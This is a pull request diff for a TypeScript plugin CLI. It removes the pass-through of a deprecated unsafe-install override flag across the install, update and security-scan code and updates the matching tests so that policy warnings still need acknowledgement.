### PR TITLE
refactor(plugins): remove unused install option forwarding

### DIFF
--- a/src/cli/install-policy-warning-acknowledgement.test.ts
+++ b/src/cli/install-policy-warning-acknowledgement.test.ts
@@ -85,16 +85,6 @@ describe("resolveInstallPolicyWarningAcknowledgementCliOptions", () => {
     expect(promptTextMock).not.toHaveBeenCalled();
   });
 
-  it("keeps the deprecated unsafe flag inert without suppressing an interactive prompt", () => {
-    setTty(true);
-    const options = resolveInstallPolicyWarningAcknowledgementCliOptions({
-      dangerouslyForceUnsafeInstall: true,
-    });
-
-    expect(options.dangerouslyForceUnsafeInstall).toBe(true);
-    expect(options.onInstallPolicyWarning).toBeTypeOf("function");
-  });
-
   it("uses the dedicated acknowledgement flag for every warning without prompting", async () => {
     setTty(false);
     const options = resolveInstallPolicyWarningAcknowledgementCliOptions({

--- a/src/cli/install-policy-warning-acknowledgement.ts
+++ b/src/cli/install-policy-warning-acknowledgement.ts
@@ -11,29 +11,25 @@ function canPromptForInstallPolicyWarning(): boolean {
 
 export function resolveInstallPolicyWarningAcknowledgementCliOptions(params: {
   acknowledgeInstallPolicyWarning?: boolean;
-  dangerouslyForceUnsafeInstall?: boolean;
   allowPrompt?: boolean;
-}): Pick<InstallSafetyOverrides, "dangerouslyForceUnsafeInstall" | "onInstallPolicyWarning"> {
+}): Pick<InstallSafetyOverrides, "onInstallPolicyWarning"> {
   const canPrompt =
     !params.acknowledgeInstallPolicyWarning &&
     params.allowPrompt !== false &&
     canPromptForInstallPolicyWarning();
-  return {
-    ...(params.dangerouslyForceUnsafeInstall ? { dangerouslyForceUnsafeInstall: true } : {}),
-    ...(params.acknowledgeInstallPolicyWarning
+  return params.acknowledgeInstallPolicyWarning
+    ? {
+        onInstallPolicyWarning: async () => ({ status: "approved" as const }),
+      }
+    : canPrompt
       ? {
-          onInstallPolicyWarning: async () => ({ status: "approved" as const }),
+          onInstallPolicyWarning: async (request: InstallPolicyWarningAcknowledgementRequest) => {
+            const targetName = sanitizeTerminalText(request.targetName);
+            const answer = await promptText(
+              `type: '${targetName}' to ${request.requestMode} anyway\n> `,
+            );
+            return answer.trim() === targetName ? { status: "approved" } : { status: "declined" };
+          },
         }
-      : canPrompt
-        ? {
-            onInstallPolicyWarning: async (request: InstallPolicyWarningAcknowledgementRequest) => {
-              const targetName = sanitizeTerminalText(request.targetName);
-              const answer = await promptText(
-                `type: '${targetName}' to ${request.requestMode} anyway\n> `,
-              );
-              return answer.trim() === targetName ? { status: "approved" } : { status: "declined" };
-            },
-          }
-        : {}),
-  };
+      : {};
 }

--- a/src/cli/plugins-cli.install.test.ts
+++ b/src/cli/plugins-cli.install.test.ts
@@ -6,6 +6,7 @@ import { installedPluginRoot } from "openclaw/plugin-sdk/test-fixtures";
 import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
 import type { OpenClawConfig } from "../config/config.js";
 import { hashConfigIncludeRaw } from "../config/includes.js";
+import type { InstallSafetyOverrides } from "../plugins/install-security-scan.types.js";
 import { loadInstalledPluginIndexInstallRecords } from "../plugins/installed-plugin-index-records.js";
 import { recordPluginManifestInstallOwner } from "../plugins/manifest-install-owner.js";
 import * as officialInstallTrust from "../plugins/official-external-install-trust.js";
@@ -372,7 +373,6 @@ type PluginInstallCall = {
   allowSourceTypeScriptEntries?: boolean;
   archivePath?: string;
   confirmInstall?: () => boolean | Promise<boolean>;
-  dangerouslyForceUnsafeInstall?: boolean;
   dryRun?: boolean;
   expectedIntegrity?: string;
   expectedPackageKind?: "hook-only";
@@ -383,7 +383,7 @@ type PluginInstallCall = {
     info?: unknown;
     warn?: unknown;
   };
-  onInstallPolicyWarning?: unknown;
+  onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   marketplace?: string;
   mode?: string;
   path?: string;
@@ -873,7 +873,6 @@ describe("plugins cli install", () => {
 
     expect(installHooksFromNpmSpecMock).toHaveBeenCalledTimes(1);
     expect(hookNpmInstallCall().inspection).toBe("package-kind");
-    expect(hookNpmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
     expect(installPluginFromNpmSpecMock).not.toHaveBeenCalled();
     expect(configWriteMock).not.toHaveBeenCalled();
     expect(runtimeErrors.at(-1)).toContain(
@@ -1841,6 +1840,7 @@ describe("plugins cli install", () => {
         targetName: "demo",
         targetType: "plugin",
         requestMode: "install",
+        reason: "Review this plugin",
       }),
     ).resolves.toEqual({ status: "approved" });
     await expect(
@@ -1848,6 +1848,7 @@ describe("plugins cli install", () => {
         targetName: "demo-dependency",
         targetType: "plugin",
         requestMode: "install",
+        reason: "Review this dependency",
       }),
     ).resolves.toEqual({ status: "approved" });
   });
@@ -2566,7 +2567,6 @@ describe("plugins cli install", () => {
 
     expect(npmInstallCall().spec).toBe("demo");
     expect(npmInstallCall().mode).toBe("update");
-    expect(npmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
     expect(
       pluginsCliRuntimeLogs.filter((message) =>
         message.includes(
@@ -2577,15 +2577,34 @@ describe("plugins cli install", () => {
     expect(installPluginFromClawHubMock).not.toHaveBeenCalled();
   });
 
-  it("passes an install-policy warning prompt to interactive plugin installs", async () => {
-    setTty(true);
-    primeSuccessfulPluginPersistence("demo");
-    installPluginFromNpmSpecMock.mockResolvedValue(createNpmPluginInstallResult("demo"));
+  it.each([false, true])(
+    "requires policy acknowledgement with deprecated flag=%s",
+    async (deprecatedFlag) => {
+      setTty(true);
+      primeSuccessfulPluginPersistence("demo");
+      installPluginFromNpmSpecMock.mockResolvedValue(createNpmPluginInstallResult("demo"));
 
-    await runAcknowledgedPluginsInstallCommand(["plugins", "install", "npm:demo"]);
+      await runAcknowledgedPluginsInstallCommand([
+        "plugins",
+        "install",
+        "npm:demo",
+        ...(deprecatedFlag ? ["--dangerously-force-unsafe-install"] : []),
+      ]);
 
-    expect(npmInstallCall().onInstallPolicyWarning).toEqual(expect.any(Function));
-  });
+      const acknowledge = npmInstallCall().onInstallPolicyWarning;
+      const request = {
+        targetType: "plugin" as const,
+        requestMode: "install" as const,
+        reason: "Review this plugin",
+      };
+      await expect(acknowledge?.({ ...request, targetName: "another-plugin" })).resolves.toEqual({
+        status: "declined",
+      });
+      await expect(acknowledge?.({ ...request, targetName: "demo" })).resolves.toEqual({
+        status: "approved",
+      });
+    },
+  );
 
   it("reports npm install failures without trying ClawHub when npm: prefix is used", async () => {
     pluginCliConfigMock.mockReturnValue({} as OpenClawConfig);
@@ -2734,7 +2753,7 @@ describe("plugins cli install", () => {
     expect(runtimeErrors.at(-1)).toContain("openclaw plugins install git:<repo>@<ref> --force");
   });
 
-  it("passes dangerous force unsafe install to marketplace installs", async () => {
+  it("accepts the deprecated unsafe flag for marketplace installs", async () => {
     await expect(
       runAcknowledgedPluginsInstallCommand([
         "plugins",
@@ -2748,10 +2767,9 @@ describe("plugins cli install", () => {
 
     expect(marketplaceInstallCall().marketplace).toBe("local/repo");
     expect(marketplaceInstallCall().plugin).toBe("alpha");
-    expect(marketplaceInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
-  it("passes dangerous force unsafe install to npm installs", async () => {
+  it("accepts the deprecated unsafe flag for npm installs", async () => {
     primeNpmPluginFallback();
 
     await runAcknowledgedPluginsInstallCommand([
@@ -2762,10 +2780,9 @@ describe("plugins cli install", () => {
     ]);
 
     expect(npmInstallCall().spec).toBe("demo");
-    expect(npmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
-  it("passes dangerous force unsafe install to linked path probe installs", async () => {
+  it("preserves linked path probes with the deprecated unsafe flag", async () => {
     const cfg = {
       plugins: {
         entries: {},
@@ -2806,10 +2823,9 @@ describe("plugins cli install", () => {
     expect(pathInstallCall().mode).toBe("install");
     expect(pathInstallCall().dryRun).toBe(true);
     expect(pathInstallCall().allowSourceTypeScriptEntries).toBe(true);
-    expect(pathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
-  it("passes dangerous force unsafe install to linked hook-pack probe fallback", async () => {
+  it("preserves linked hook-pack fallback with the deprecated unsafe flag", async () => {
     const tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-hook-link-"));
     primeHookPackPathFallback({
       tmpRoot,
@@ -2830,7 +2846,6 @@ describe("plugins cli install", () => {
 
     expect(hookPathInstallCall().path).toBe(tmpRoot);
     expect(hookPathInstallCall().dryRun).toBe(true);
-    expect(hookPathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
   it("does not fall back to hook pack for linked path when a no-flag security scan blocks", async () => {
@@ -2857,7 +2872,7 @@ describe("plugins cli install", () => {
     expect(runtimeErrors.at(-1)).not.toContain("Also not a valid hook pack");
   });
 
-  it("passes dangerous force unsafe install to local hook-pack fallback installs", async () => {
+  it("preserves local hook-pack fallback with the deprecated unsafe flag", async () => {
     const tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-hook-install-"));
     primeHookPackPathFallback({
       tmpRoot,
@@ -2877,7 +2892,6 @@ describe("plugins cli install", () => {
 
     expect(hookPathInstallCall().path).toBe(tmpRoot);
     expect(hookPathInstallCall().mode).toBe("update");
-    expect(hookPathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
   it("passes the active profile extensions dir to local path installs", async () => {
@@ -2977,7 +2991,6 @@ describe("plugins cli install", () => {
           logger?: { warn?: (message: string) => void };
           path: string;
           dryRun?: boolean;
-          dangerouslyForceUnsafeInstall?: boolean;
         },
       ];
       params.logger?.warn?.("WARNING: installer warning from dry-run probe");
@@ -3011,7 +3024,6 @@ describe("plugins cli install", () => {
     expect(pathInstallCall().path).toBe(localPluginDir);
     expect(pathInstallCall().dryRun).toBe(true);
     expect(pathInstallCall().allowSourceTypeScriptEntries).toBe(true);
-    expect(pathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
     expect(typeof pathInstallCall().logger?.info).toBe("function");
     expect(typeof pathInstallCall().logger?.warn).toBe("function");
     expect(runtimeLogsContain("installer warning from dry-run probe")).toBe(true);
@@ -3150,7 +3162,6 @@ describe("plugins cli install", () => {
     ]);
 
     expect(hookNpmInstallCall().spec).toBe("@acme/demo-hooks");
-    expect(hookNpmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
     expect(runtimeLogsContain("Installed hook pack: demo-hooks")).toBe(true);
   });
 

--- a/src/cli/plugins-cli.update.test.ts
+++ b/src/cli/plugins-cli.update.test.ts
@@ -501,7 +501,6 @@ describe("plugins cli update", () => {
     expect(hookUpdateParams.specOverrides).toEqual(
       specOverride ? { "demo-hooks": specOverride } : undefined,
     );
-    expect(hookUpdateParams.dangerouslyForceUnsafeInstall).toBe(true);
     expect(updateNpmInstalledPluginsMock).not.toHaveBeenCalled();
     expect(configWriteMock).toHaveBeenCalledWith(nextConfig);
     expect(replaceConfigFileMock).toHaveBeenCalledWith(
@@ -1411,7 +1410,7 @@ describe("plugins cli update", () => {
     expect(pluginsCliRuntimeLogs.at(-1)).toBe("No tracked plugins or hook packs to update.");
   });
 
-  it("passes dangerous force unsafe install to plugin updates", async () => {
+  it("warns once for the deprecated unsafe flag on updates", async () => {
     const config = createTrackedPluginConfig({
       pluginId: "openclaw-codex-app-server",
       spec: "openclaw-codex-app-server@beta",
@@ -1430,7 +1429,6 @@ describe("plugins cli update", () => {
     const updateParams = expectSingleCallParams(updateNpmInstalledPluginsMock);
     expect(updateParams.config).toEqual(config);
     expect(updateParams.pluginIds).toEqual(["openclaw-codex-app-server"]);
-    expect(updateParams.dangerouslyForceUnsafeInstall).toBe(true);
     expect(
       pluginsCliRuntimeLogs.filter((message) =>
         message.includes(

--- a/src/cli/plugins-install-command.ts
+++ b/src/cli/plugins-install-command.ts
@@ -109,7 +109,6 @@ async function runPluginInstallCommandUnlocked(
     ...resolveInstallPolicyWarningAcknowledgementCliOptions({
       acknowledgeInstallPolicyWarning: opts.acknowledgeInstallPolicyWarning,
       allowPrompt: params.allowInstallPolicyWarningPrompt,
-      dangerouslyForceUnsafeInstall: opts.dangerouslyForceUnsafeInstall,
     }),
   });
   const capabilityConsent = resolvePluginCapabilityConsentCliOptions({

--- a/src/cli/plugins-install-hook-fallback.ts
+++ b/src/cli/plugins-install-hook-fallback.ts
@@ -40,7 +40,6 @@ export function resolveInstallSafetyOverrides(
 ): InstallSafetyOverrides {
   return {
     config: overrides.config,
-    dangerouslyForceUnsafeInstall: overrides.dangerouslyForceUnsafeInstall,
     onInstallPolicyWarning: overrides.onInstallPolicyWarning,
     trustedSourceLinkedOfficialInstall: overrides.trustedSourceLinkedOfficialInstall,
   };

--- a/src/cli/plugins-install-preflight.ts
+++ b/src/cli/plugins-install-preflight.ts
@@ -17,6 +17,7 @@ export type RunPluginInstallCommandParams = {
   opts: InstallSafetyOverrides & {
     acceptCapabilities?: boolean;
     acknowledgeInstallPolicyWarning?: boolean;
+    dangerouslyForceUnsafeInstall?: boolean;
     expectedIntegrity?: string;
     expectedPluginId?: string;
     force?: boolean;

--- a/src/cli/plugins-update-command.ts
+++ b/src/cli/plugins-update-command.ts
@@ -418,7 +418,6 @@ async function runPluginUpdateCommandUnlocked(
 
   const installPolicyWarningAcknowledgement = resolveInstallPolicyWarningAcknowledgementCliOptions({
     acknowledgeInstallPolicyWarning: params.opts.acknowledgeInstallPolicyWarning,
-    dangerouslyForceUnsafeInstall: params.opts.dangerouslyForceUnsafeInstall,
     allowPrompt: !params.opts.dryRun,
   });
   const deferredInstallTransactions: PluginInstallTransaction[] = [];

--- a/src/hooks/install.test.ts
+++ b/src/hooks/install.test.ts
@@ -922,9 +922,6 @@ describe("installHooksFromNpmSpec", () => {
         async (
           params: Parameters<typeof hookInstallRuntime.installFromValidatedNpmSpecArchive>[0],
         ) => {
-          expect(
-            (params.archiveInstallParams as Record<string, unknown>).dangerouslyForceUnsafeInstall,
-          ).toBeUndefined();
           expect(params.archiveInstallParams).toEqual(
             expect.objectContaining({
               installPolicyRequest: {

--- a/src/hooks/install.ts
+++ b/src/hooks/install.ts
@@ -99,7 +99,6 @@ type HookPathInstallParams = { path: string } & HookInstallForwardParams;
 function buildHookInstallForwardParams(params: HookInstallForwardParams): HookInstallForwardParams {
   return copyPackageDirInstallTransactionRequest(params, {
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     hooksDir: params.hooksDir,
@@ -163,7 +162,6 @@ async function runHookInstallPolicy(params: {
     scan: async () =>
       await scanPackageInstallSource({
         config: params.forward.config,
-        dangerouslyForceUnsafeInstall: params.forward.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.forward.onInstallPolicyWarning,
         trustedSourceLinkedOfficialInstall: params.forward.trustedSourceLinkedOfficialInstall,
         packageDir: params.packageDir,

--- a/src/hooks/update.ts
+++ b/src/hooks/update.ts
@@ -85,7 +85,6 @@ function createHookPackUpdateIntegrityDriftHandler(params: {
 /** Update npm-installed hook packs and return config changes plus per-pack outcomes. */
 export async function updateNpmInstalledHookPacks(params: {
   config: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   logger?: HookPackUpdateLogger;
   hookIds?: string[];
@@ -170,7 +169,6 @@ export async function updateNpmInstalledHookPacks(params: {
       requestDeferredPackageDirInstall(
         {
           config: params.config,
-          dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
           onInstallPolicyWarning: params.onInstallPolicyWarning,
           spec: effectiveSpec,
           mode: "update",

--- a/src/plugins/clawhub.test.ts
+++ b/src/plugins/clawhub.test.ts
@@ -283,7 +283,6 @@ type PackageLookupCall = {
 
 type ArchiveInstallCall = {
   archivePath?: string;
-  dangerouslyForceUnsafeInstall?: boolean;
   expectedPluginId?: string;
   onInstallPolicyWarning?: unknown;
   installPolicyRequest?: {
@@ -1895,16 +1894,6 @@ describe("installPluginFromClawHub", () => {
     expect(archiveCleanupMock).not.toHaveBeenCalled();
   });
 
-  it("passes dangerous force unsafe install through to archive installs", async () => {
-    await installPluginFromClawHub({
-      spec: "clawhub:demo",
-      dangerouslyForceUnsafeInstall: true,
-    });
-
-    expect(archiveInstallCall().archivePath).toBe("/tmp/clawhub-demo/archive.zip");
-    expect(archiveInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
-  });
-
   it("passes install policy acknowledgement through to archive installs", async () => {
     const onInstallPolicyWarning = vi.fn().mockResolvedValue({ status: "approved" });
 
@@ -1914,6 +1903,7 @@ describe("installPluginFromClawHub", () => {
     });
 
     expect(archiveInstallCall().onInstallPolicyWarning).toBe(onInstallPolicyWarning);
+    expect(archiveInstallCall().archivePath).toBe("/tmp/clawhub-demo/archive.zip");
   });
 
   it("cleans up the downloaded archive even when archive install fails", async () => {

--- a/src/plugins/clawhub.ts
+++ b/src/plugins/clawhub.ts
@@ -1450,7 +1450,6 @@ export async function installPluginFromClawHub(
     const installResult = await installPluginFromArchive(
       copyPluginInstallTransactionRequest(params, {
         archivePath: archive.archivePath,
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.onInstallPolicyWarning,
         trustedSourceLinkedOfficialInstall:
           officialClawHubPackage || isTrustedSourceLinkedOfficialPackage(detail.package!),

--- a/src/plugins/git-install.ts
+++ b/src/plugins/git-install.ts
@@ -421,7 +421,6 @@ export async function installPluginFromGitSpec(
     };
     const preflight = await preflightPluginGitInstallPolicy({
       config: params.config,
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       logger: params.logger ?? {},
       mode: effectiveMode,
@@ -476,7 +475,6 @@ export async function installPluginFromGitSpec(
     }
 
     const result = await installPluginFromInstalledPackageDir({
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       config: params.config,
       packageDir: repoDir,

--- a/src/plugins/install-installed-package.ts
+++ b/src/plugins/install-installed-package.ts
@@ -49,7 +49,6 @@ export async function validatePackagePluginInstallSource(params: {
   expectedPluginId?: string;
   requirePluginManifest?: boolean;
   allowSourceTypeScriptEntries?: boolean;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   trustedSourceLinkedOfficialInstall?: boolean;
   config?: OpenClawConfig;
@@ -165,7 +164,6 @@ export async function validatePackagePluginInstallSource(params: {
     ),
     scan: async () =>
       await params.runtime.scanPackageInstallSource({
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.onInstallPolicyWarning,
         trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
         packageDir: params.packageDir,
@@ -292,7 +290,6 @@ async function installPluginFromInstalledPackageDirInternal(
     expectedPluginId: params.expectedPluginId,
     requirePluginManifest: params.requirePluginManifest,
     allowSourceTypeScriptEntries: params.allowSourceTypeScriptEntries,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     config: params.config,

--- a/src/plugins/install-managed-npm.ts
+++ b/src/plugins/install-managed-npm.ts
@@ -135,7 +135,6 @@ export async function installPluginFromManagedNpmRoot(
       scan: async () =>
         await preflightPluginNpmInstallPolicy({
           config: params.config,
-          dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
           onInstallPolicyWarning: params.onInstallPolicyWarning,
           logger,
           mode: policyMode,
@@ -529,7 +528,6 @@ export async function installPluginFromManagedNpmRoot(
       }
     }
     const result = await installPluginFromInstalledPackageDir({
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       config: params.config,
       additionalDependencyPackageDirs: newRootPackageDirs,

--- a/src/plugins/install-npm-pack.ts
+++ b/src/plugins/install-npm-pack.ts
@@ -140,7 +140,6 @@ export async function installPluginFromNpmPackArchive(
 
   const result = await installPluginFromManagedNpmRoot(
     copyPluginInstallTransactionRequest(params, {
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
       config: params.config,

--- a/src/plugins/install-npm.ts
+++ b/src/plugins/install-npm.ts
@@ -210,7 +210,6 @@ export async function installPluginFromNpmSpec(
       scan: async () =>
         await preflightPluginNpmInstallPolicy({
           config: params.config,
-          dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
           onInstallPolicyWarning: params.onInstallPolicyWarning,
           logger,
           mode: policyMode,
@@ -231,7 +230,6 @@ export async function installPluginFromNpmSpec(
 
   const result = await installPluginFromManagedNpmRoot(
     copyPluginInstallTransactionRequest(params, {
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
       config: params.config,

--- a/src/plugins/install-package.ts
+++ b/src/plugins/install-package.ts
@@ -47,7 +47,6 @@ function pickPackageInstallCommonParams(
 ): InternalPackageInstallCommonParams {
   return copyPluginInstallTransactionRequest(params, {
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     extensionsDir: params.extensionsDir,
@@ -164,7 +163,6 @@ async function installBundleFromSourceDir(
     sourceFamily: sourceFamilyForInstallPolicyKind(params.installPolicyRequest?.kind, "archive"),
     scan: async () =>
       await runtime.scanBundleInstallSource({
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.onInstallPolicyWarning,
         config: params.config,
         sourceDir: params.sourceDir,
@@ -296,7 +294,6 @@ async function installPluginFromPackageDir(
     expectedPluginId: params.expectedPluginId,
     requirePluginManifest: params.requirePluginManifest,
     allowSourceTypeScriptEntries: params.allowSourceTypeScriptEntries,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     config: params.config,
@@ -392,7 +389,6 @@ export async function installPluginFromArchive(
         sourceDir,
         ...pickPackageInstallCommonParams(
           copyPluginInstallTransactionRequest(params, {
-            dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
             onInstallPolicyWarning: params.onInstallPolicyWarning,
             extensionsDir: params.extensionsDir,
             timeoutMs,

--- a/src/plugins/install-security-scan.runtime.test.ts
+++ b/src/plugins/install-security-scan.runtime.test.ts
@@ -426,13 +426,12 @@ describe("legacy file install scan compatibility", () => {
     expect(runInstallPolicyMock).toHaveBeenCalledTimes(2);
   });
 
-  it("keeps the deprecated unsafe flag inert when policy warns", async () => {
+  it("blocks policy warnings without acknowledgement", async () => {
     runInstallPolicyMock.mockResolvedValue({
       warning: { reason: "review this plugin", fingerprint: "warning-a" },
     });
 
     const result = await scanFileInstallSourceRuntime({
-      dangerouslyForceUnsafeInstall: true,
       filePath: "/tmp/payload.js",
       logger: {},
       pluginId: "payload",
@@ -708,18 +707,20 @@ describe("legacy file install scan compatibility", () => {
   it.each(["security_scan_blocked", "security_scan_failed"] as const)(
     "does not let acknowledgement override %s",
     async (code) => {
+      const onInstallPolicyWarning = vi.fn(async () => ({ status: "approved" as const }));
       runInstallPolicyMock.mockResolvedValueOnce({
         blocked: { code, reason: "blocked by operator policy" },
       });
 
       const result = await scanFileInstallSourceRuntime({
-        dangerouslyForceUnsafeInstall: true,
+        onInstallPolicyWarning,
         filePath: "/tmp/payload.js",
         logger: {},
         pluginId: "payload",
       });
 
       expect(result?.blocked?.reason).toBe("blocked by operator policy");
+      expect(onInstallPolicyWarning).not.toHaveBeenCalled();
     },
   );
 

--- a/src/plugins/install-security-scan.runtime.ts
+++ b/src/plugins/install-security-scan.runtime.ts
@@ -699,7 +699,6 @@ function shouldBypassOpenClawInstallFriction(params: {
 
 async function runOperatorInstallPolicy(params: {
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   logger: InstallScanLogger;
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   origin: InstallPolicyOrigin;
@@ -907,7 +906,6 @@ export async function scanBundleInstallSourceRuntime(
   const runPolicy = () =>
     runOperatorInstallPolicy({
       config: params.config,
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       logger: params.logger,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       origin: { type: "plugin-bundle", ...(params.version ? { version: params.version } : {}) },
@@ -980,7 +978,6 @@ export async function scanPackageInstallSourceRuntime(
   const runPolicy = () =>
     runOperatorInstallPolicy({
       config: params.config,
-      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       logger: params.logger,
       onInstallPolicyWarning: params.onInstallPolicyWarning,
       origin: {
@@ -1113,7 +1110,6 @@ export async function scanFileInstallSourceRuntime(
 ): Promise<InstallSecurityScanResult | undefined> {
   const policyResult = await runOperatorInstallPolicy({
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     logger: params.logger,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     origin: { type: "plugin-file" },
@@ -1157,7 +1153,6 @@ export async function scanFileInstallSourceRuntime(
 
 export async function preflightPluginNpmInstallPolicyRuntime(params: {
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   logger: InstallScanLogger;
   mode?: "install" | "update";
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
@@ -1171,7 +1166,6 @@ export async function preflightPluginNpmInstallPolicyRuntime(params: {
   const pluginId = params.pluginId ?? params.packageName;
   return await runOperatorInstallPolicy({
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     logger: params.logger,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     origin: { type: "plugin-npm", packageName: params.packageName },
@@ -1193,7 +1187,6 @@ export async function preflightPluginNpmInstallPolicyRuntime(params: {
 
 export async function preflightPluginGitInstallPolicyRuntime(params: {
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   logger: InstallScanLogger;
   mode?: "install" | "update";
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
@@ -1204,7 +1197,6 @@ export async function preflightPluginGitInstallPolicyRuntime(params: {
 }): Promise<InstallSecurityScanResult | undefined> {
   return await runOperatorInstallPolicy({
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     logger: params.logger,
     onInstallPolicyWarning: params.onInstallPolicyWarning,
     origin: { type: "plugin-git" },

--- a/src/plugins/install-security-scan.types.ts
+++ b/src/plugins/install-security-scan.types.ts
@@ -17,7 +17,6 @@ type InstallPolicyWarningAcknowledgementResult = { status: "approved" } | { stat
 /** Overrides that intentionally loosen install safety policy for trusted/operator paths. */
 export type InstallSafetyOverrides = {
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: (
     request: InstallPolicyWarningAcknowledgementRequest,
   ) => Promise<InstallPolicyWarningAcknowledgementResult>;

--- a/src/plugins/install.npm-spec.test.ts
+++ b/src/plugins/install.npm-spec.test.ts
@@ -3086,7 +3086,7 @@ describe("installPluginFromNpmSpec", () => {
     ).toBe(false);
   });
 
-  it("treats dangerouslyForceUnsafeInstall as a no-op for npm-spec installs", async () => {
+  it("installs npm packages without built-in dangerous-code scanning", async () => {
     const npmRoot = path.join(suiteTempRootTracker.makeTempDir(), "npm");
     const warnings: string[] = [];
     mockNpmViewAndInstall({
@@ -3100,7 +3100,6 @@ describe("installPluginFromNpmSpec", () => {
 
     const result = await installPluginFromNpmSpec({
       spec: "dangerous-plugin@1.0.0",
-      dangerouslyForceUnsafeInstall: true,
       npmDir: npmRoot,
       logger: {
         info: () => {},

--- a/src/plugins/install.test.ts
+++ b/src/plugins/install.test.ts
@@ -299,14 +299,12 @@ async function installFromDirWithWarnings(params: {
   pluginDir: string;
   extensionsDir: string;
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: InstallPluginFromDirParams["onInstallPolicyWarning"];
   trustedSourceLinkedOfficialInstall?: boolean;
   mode?: "install" | "update";
 }) {
   const warnings: string[] = [];
   const result = await installPluginFromDir({
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     dirPath: params.pluginDir,
     extensionsDir: params.extensionsDir,
@@ -580,14 +578,12 @@ async function installFromArchiveWithWarnings(params: {
   archivePath: string;
   extensionsDir: string;
   config?: OpenClawConfig;
-  dangerouslyForceUnsafeInstall?: boolean;
   trustedSourceLinkedOfficialInstall?: boolean;
 }) {
   const warnings: string[] = [];
   const result = await installPluginFromArchive({
     archivePath: params.archivePath,
     config: params.config,
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
     extensionsDir: params.extensionsDir,
     logger: {
@@ -1774,32 +1770,6 @@ describe("installPluginFromArchive", () => {
